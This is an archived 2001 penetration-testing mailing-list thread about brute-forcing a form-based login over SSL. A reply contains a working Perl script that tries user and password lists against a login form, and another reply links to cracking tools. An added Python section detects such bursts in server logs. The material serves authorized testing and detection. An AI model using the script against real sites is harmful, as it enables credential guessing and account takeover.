Re: [PEN-TEST] Web site password guessing over SSL

From: George Hedfors (george.hedforsat_private)
Date: Tue Apr 17 2001 - 14:02:01 PDT

    It's done very simply by using perl Net::SSLeay, something like this.
    Just an example:
    
    #!/usr/local/bin/perl
    
    # post_https does the HTTPS POST; make_form URL-encodes the form fields.
    use Net::SSLeay qw(post_https make_form);
    
    open(USR, "< users.txt") || die "Unable to open users file.\n";
    open(PWD, "< passwd.txt") || die "Unable to open passwd file.\n";
    # Read the password list into memory once, stripping the trailing newline.
    while(<PWD>) { chop; push @passwd, $_ }
    close(PWD);
    
    # For each user, try every password against the login form.
    while(<USR>)
      {
        chop;   # strip the newline from $_ once per user, not once per password
        foreach $pwd(@passwd)
          {
            ($page, $result, %headers)
                = post_https('www.victim.com', 443, '/login.cgi', '',
                     make_form('login'=>$_,
                               'password'=>$pwd));
            if ($page =~ /Login Successful/) { print "$_:$pwd was correct\n" }
          }
      }
    close(USR);
    
    On Tue, 17 Apr 2001, Batten, Gerald wrote:
    
    > I'm not trying to crack the SSL session itself.  I'm just trying to get an
    > idea of the quality of passwords the users are using for that site, but from
    > an external test only.
    >
    > The web server is not using the typical 'username/password' pop-up box,
    > they're using a dynamically generated form, which has a different URL every
    > time the page is brought up.  The user enters their userid and password in
    > the form and clicks on 'submit' which uses the HTTP POST method.  The
    > session is SSL-encrypted as well.  The difficulty I am having is that short
    > of writing my own perl script (which I am desperately trying to avoid...
    > sorry, I don't like coding any more), none of the tools I have found can
    > brute-force a form-based login over SSL.  I tried using sslproxy and stunnel
    > on NT/2000, but those ports lack some of the functionality I need.  My next
    > step is to try and convince one of my Linux co-workers to run stunnel on
    > their system.
    >
    > Gerald.
    >
    > Note:  Views expressed in this e-mail do not necessarily represent those of
    > my employer.
    > Note:  Views expressed in this e-mail are not necessarily mine either.
    >
    > -----Original Message-----
    > From: John R. Sciandra [mailto:johnrsat_private]
    > Sent: Tuesday, April 17, 2001 1:37 PM
    > To: PEN-TESTat_private
    > Subject: Re: Web site password guessing over SSL
    >
    >
    > Ok don't flame for being a bone head but let me pose a counter
    > question or two.
    >
    > I was under the impression that (typically) SSL is run a mode that
    > only encrypts the transport between the client and server.  I think it
    > is possible to use SSL to restrict access to the web server by userid
    > in some modes but that generally is not how SSL is setup.
    >
    > If I understand correctly you are just trying to crack the web servers
    > challenge. I think that what happens with cracking the web servers
    > password is more of an end point dialog between the web server and the
    > client.  So if you can establish your SSL session (as if you were
    > browsing the site) and are able to get the prompt for userid and
    > password that the web server presents, you should be in business. Did
    > I miss it? Do you have to do something extra with the SSL?
    >
    > If on the other hand you are trying to crack the actual SSL session
    > itself...I am not sure but doesn't that involve cracking RSA or
    > something?
    >
    > - -John
    >
    > - -----Original Message-----
    > From: Penetration Testers [mailto:PEN-TESTat_private]On Behalf
    > Of Joel Brown
    > Sent: Friday, April 13, 2001 10:52 AM
    > To: PEN-TESTat_private
    > Subject: Re: [PEN-TEST] Web site password guessing over SSL
    >
    >
    > ssl.cracker.exe at
    > http://neworder.box.sk/search.php3?srch=ssl+brute should work,
    > also check out ObiWan at
    > http://www.phenoelit.de/obiwan/
    >
    > Joel
    >
    > >>Our client wants us to try to brute-force one of their public web sites that
    > >>is password-protected via a form-based login over SSL.
    >
    >
    
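    The server-side view of the script above, as an added example that is not part of this thread: each guess is one POST to the login path from the same client in quick succession, so a sliding-window count of login POSTs per source flags it even though the form URL carries a fresh token every time. The log lines are constructed sample data in Apache combined format, and the login path /login.cgi and the threshold are assumptions taken from the Perl example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Apache combined-format prefix: client, identd, user, [timestamp], "request", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
LOGIN_PATH = "/login.cgi"  # assumed from the Perl example; query string is ignored

def parse_line(line):
    """Return (ip, timestamp, method, path-without-query, status) or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    path = m.group("path").split("?", 1)[0]   # drop the per-request form token
    return m.group("ip"), ts, m.group("method"), path, int(m.group("status"))

def detect_login_bursts(lines, threshold=5, window=timedelta(seconds=60)):
    """Map each source IP to the time it first exceeded `threshold` login
    POSTs inside a sliding `window`; sources under the threshold are absent."""
    recent = defaultdict(deque)   # ip -> timestamps of login POSTs in the window
    alerts = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts, method, path, _status = rec
        if method != "POST" or path != LOGIN_PATH:
            continue
        q = recent[ip]
        q.append(ts)
        while q and ts - q[0] > window:   # expire attempts older than the window
            q.popleft()
        if len(q) > threshold and ip not in alerts:
            alerts[ip] = ts
    return alerts

# Constructed sample: one normal login, then a burst of seven guesses at 5 s intervals.
SAMPLE_LOG = [
    '198.51.100.7 - - [17/Apr/2001:14:02:00 -0700] "GET /login.cgi?sid=a1 HTTP/1.0" 200 1320',
    '198.51.100.7 - - [17/Apr/2001:14:02:09 -0700] "POST /login.cgi?sid=a1 HTTP/1.0" 302 0',
] + [
    '192.0.2.10 - - [17/Apr/2001:14:03:%02d -0700] "POST /login.cgi?sid=t%d HTTP/1.0" 200 640'
    % (5 * i, i) for i in range(7)
]

if __name__ == "__main__":
    for ip, when in detect_login_bursts(SAMPLE_LOG).items():
        print("login burst from %s, threshold exceeded at %s" % (ip, when.isoformat()))
```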
    This archive was generated by hypermail 2b30 : Tue Apr 17 2001 - 17:49:11 PDT